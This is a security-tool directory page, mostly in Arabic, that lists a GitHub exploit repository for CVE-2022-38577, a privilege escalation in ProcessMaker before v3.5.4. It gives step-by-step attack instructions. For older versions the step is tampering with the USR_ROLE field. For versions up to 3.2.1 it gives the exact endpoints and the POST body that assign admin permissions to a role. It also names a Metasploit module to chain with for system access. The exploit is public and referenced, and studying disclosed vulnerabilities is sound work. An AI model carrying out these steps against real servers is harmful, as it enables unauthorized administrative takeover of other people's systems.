Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/sornram9254/cve-2022-38577-processmaker
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقArchived
GitHubsornram9254/cve-2022-38577-processmaker

CVE-2022-38577-Processmaker

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

اكتُشف أن ProcessMaker قبل الإصدار v3.5.4 يحتوي على أذونات غير آمنة في صفحة الملف الشخصي للمستخدم. تسمح هذه الثغرة للمهاجمين بترقية المستخدمين العاديين إلى مسؤولين.

عرض المستودع
313منذ سنة واحدةلم تتم المراجعة بعد

تم أرشفة هذا المستودع ونقله إلى: https://github.com/sornram9254/CVE-BBP-VDP


ProcessMaker - تصعيد صلاحيات ملف تعريف المستخدم

CVE-2022-38577

تم اكتشاف أن ProcessMaker قبل الإصدار v3.5.4 يحتوي على أذونات غير آمنة في صفحة ملف تعريف المستخدم. تسمح هذه الثغرة للمهاجمين بتصعيد المستخدمين العاديين إلى مسؤولين.

* يمكن استخدام هذا الاستغلال مع وحدة Metasploit (ProcessMaker Plugin Upload) - exploit/multi/http/processmaker_plugin_upload للحصول على وصول للنظام.

root@kitploit:~
Privilege Escalation replication.
for 2.5.0 - 3.0 GA:
    1. Log in as normal user.
    2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".
    3. Refresh page to get new role.

for 3.2.1 and before:
    1. Log in as normal user.
    2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"
    3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"
    4. Update role to escalation privileges using POST Body request:
    POST /sysworkflow/en/neoclassic/roles/roles_Ajax
    request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}

https://youtu.be/PVaChDG3ZQ0
CVE-2022-38577 : ProcessMaker - User Profile Privilege Escalation

TODO: تحسين الكود [requests module] ومعالجة الاستثناءات.

المراجع:
[x] https://nvd.nist.gov/vuln/detail/CVE-2022-38577
[x] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38577
[x] https://packetstormsecurity.com/files/168427/ProcessMaker-Privilege-Escalation.html
[x] https://drive.google.com/file/d/1iP9NYUkYEy_FGMpcnTkUWn8nGcqDT02_/view?usp=sharing

تنزيل الأداة